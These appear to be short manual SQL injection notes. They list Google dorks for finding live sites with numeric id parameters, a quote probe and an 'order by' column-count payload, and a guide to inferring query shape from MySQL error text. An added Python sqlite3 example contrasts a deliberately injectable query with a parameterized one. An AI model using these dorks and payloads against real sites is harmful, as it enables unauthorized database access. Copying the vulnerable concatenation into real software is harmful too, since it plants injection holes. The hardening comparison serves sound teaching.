Manual SQLi
1. Find targets:
inurl:.php?id=1/2/3/4/..
inurl:.course.php?id=5
2. Test whether an injection point exists:
'
3. Test the number of columns:
order by 3 --+
4. Display the database
Determine the query shape from the error message:
1:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
The outermost single quotes belong to the quoted string in the error message; strip them and the SQL fragment is '1'' LIMIT 0,1, which shows that the id field is a string (character) type.
2:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
id is a numeric type: remove the leading ' from the payload and leave the rest unchanged.
3:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
The SQL statement is presumably:
select * from users where id = ('$id')
This is a variant of the string type that only adds a parenthesis; a small modification of the payload above is enough.
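All three error messages above have the same root cause: the id parameter is spliced into the SQL text, so the database parses the user's quote as syntax and echoes the surrounding statement back. As an added example that is not part of these notes, the following Python uses sqlite3 as a stand-in for MySQL (an assumption; the users table, the lookup_vulnerable/lookup_hardened names and the probe helper are constructed here) to show the third query shape built by string concatenation beside its parameterized form, and how each reacts to the ' probe from step 2.

```python
import sqlite3


def build_db():
    """Constructed in-memory table standing in for the page's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_vulnerable(conn, user_id):
    # Shape inferred on the page for error 3: the parameter is spliced into the SQL
    # text, so a quote in user_id changes the statement's structure, not its data.
    sql = f"SELECT * FROM users WHERE id = ('{user_id}') LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, user_id):
    # Same query with a bound parameter: the driver passes user_id as a value,
    # so a quote or an ORDER BY fragment is compared against the id column,
    # never parsed as SQL.
    sql = "SELECT * FROM users WHERE id = (?) LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(conn, lookup, user_id):
    """Run one lookup and report ('rows', rows) or ('error', message).

    The message is what step 4 above reads the query shape from; a hardened
    endpoint logs it server-side and returns only a generic error to the client.
    """
    try:
        return ("rows", lookup(conn, user_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    for value in ("1", "'", "1'"):
        print(repr(value), "concatenated:", probe(db, lookup_vulnerable, value))
        print(repr(value), "bound:       ", probe(db, lookup_hardened, value))
```

With the concatenated form, the lone quote raises a syntax error (the signal step 2 looks for), while the bound form simply finds no matching row and leaks nothing about the statement.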